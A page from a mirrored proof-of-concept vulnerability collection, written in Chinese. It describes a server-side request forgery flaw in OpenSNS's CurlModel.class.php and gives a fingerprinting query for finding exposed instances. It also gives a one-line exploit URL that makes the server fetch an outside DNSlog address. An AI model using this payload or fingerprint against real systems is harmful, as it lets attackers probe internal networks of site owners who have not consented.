admin/Awesome-POC
1
0
Fork 0
mirror of https://github.com/Threekiii/Awesome-POC.git synced 2025-11-06 03:17:19 +00:00
Code Issues Packages Projects Releases Wiki Activity
Awesome-POC/CMS漏洞/OpenSNS CurlModel.class.php SSRF漏洞.md

35 lines
652 B
Markdown
Raw Normal View History

更新漏洞库:CMS漏洞/
2022-05-18 16:23:08 +08:00
# OpenSNS CurlModel.class.php SSRF漏洞
## 漏洞描述
OpenSNS CurlModel.class.php文件中curl方法存在SSRF漏洞通过漏洞攻击者可以探测内网信息
## 漏洞影响
```
OpenSNS
```
更新漏洞
2023-08-28 15:55:36 +08:00
## 网络测绘
更新漏洞库:CMS漏洞/
2022-05-18 16:23:08 +08:00
```
icon_hash="1167011145"
```
## 漏洞复现
登录页面如下
更新漏洞
2022-12-05 11:09:28 +08:00
![image-20220518154436896](./images/202205181544965.png)
更新漏洞库:CMS漏洞/
2022-05-18 16:23:08 +08:00
存在漏洞的文件为 `Application/Admin/Model/CurlModel.class.php`
更新漏洞
2022-12-05 11:09:28 +08:00
![image-20220518154502605](./images/202205181545686.png)
更新漏洞库:CMS漏洞/
2022-05-18 16:23:08 +08:00
构造POC
```
/?s=weibo/share/shareBox&query=app=Admin%26model=Curl%26method=curl%26id=http://92aq2z.dnslog.cn
```
更新漏洞
2022-12-05 11:09:28 +08:00
![image-20220518154516760](./images/202205181545840.png)
Reference in New Issue Copy Permalink